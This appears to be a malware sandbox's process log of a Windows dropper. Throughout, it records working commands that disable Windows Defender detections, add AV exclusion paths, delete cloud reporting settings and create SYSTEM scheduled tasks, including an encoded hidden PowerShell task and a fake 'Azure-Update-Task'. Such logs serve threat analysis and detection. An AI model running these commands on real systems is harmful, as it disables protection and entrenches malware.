C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FAROrqqmwDJuC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FAROrqqmwDJuC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SZbnkDASJEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SZbnkDASJEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TdgVoScrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TdgVoScrU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xmhVlMznYVRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xmhVlMznYVRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mrnDKDtAoCXFymVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mrnDKDtAoCXFymVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SZbnkDASJEUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SZbnkDASJEUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TdgVoScrU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TdgVoScrU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xmhVlMznYVRU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xmhVlMznYVRU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mrnDKDtAoCXFymVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mrnDKDtAoCXFymVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fIDQkgvqEeYuFUPy /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fIDQkgvqEeYuFUPy /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdqiMEgHI" /SC once /ST 02:43:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdqiMEgHI"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdqiMEgHI"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wovemSUpOFDwVyMam" /SC once /ST 06:21:02 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\WwbhMxH.exe\" 4h /site_id 668658 /S" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wovemSUpOFDwVyMam"2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\WwbhMxH.exeC:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\WwbhMxH.exe 4h /site_id 668658 /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEwGusBEGbIeKSSfjR"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TdgVoScrU\Orlvdm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xSbgDCImQNdWYmB" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xSbgDCImQNdWYmB2" /F /xml "C:\Program Files (x86)\TdgVoScrU\VvVIPsl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xSbgDCImQNdWYmB"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xSbgDCImQNdWYmB"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FzvIgGdeRLcgbM" /F /xml "C:\Program Files (x86)\xmhVlMznYVRU2\lppuErG.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rRYXbmmYjIvrG2" /F /xml "C:\ProgramData\mrnDKDtAoCXFymVB\ZfVvFqP.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DVpMShOGhTVXDiVCZ2" /F /xml "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\HDRnxkY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LdVsjAprHUXUOtSHAnG2" /F /xml "C:\Program Files (x86)\FAROrqqmwDJuC\tIvRXbx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lDWDrPZYJQBuPmKYQ" /SC once /ST 03:40:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\KNNoyvlM\VgIzFaA.dll\",#1 /site_id 668658" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "lDWDrPZYJQBuPmKYQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuYsxJXpqhQ" /SC once /ST 10:06:58 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\AySbEJbO\UZKWBwl.exe\" RA /S"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuYsxJXpqhQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuYsxJXpqhQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuYsxJXpqhQ"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wovemSUpOFDwVyMam"2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\fIDQkgvqEeYuFUPy\KNNoyvlM\VgIzFaA.dll",#1 /site_id 6686581⤵
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\fIDQkgvqEeYuFUPy\KNNoyvlM\VgIzFaA.dll",#1 /site_id 6686582⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lDWDrPZYJQBuPmKYQ"3⤵
-
C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\AySbEJbO\UZKWBwl.exeC:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\AySbEJbO\UZKWBwl.exe RA /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
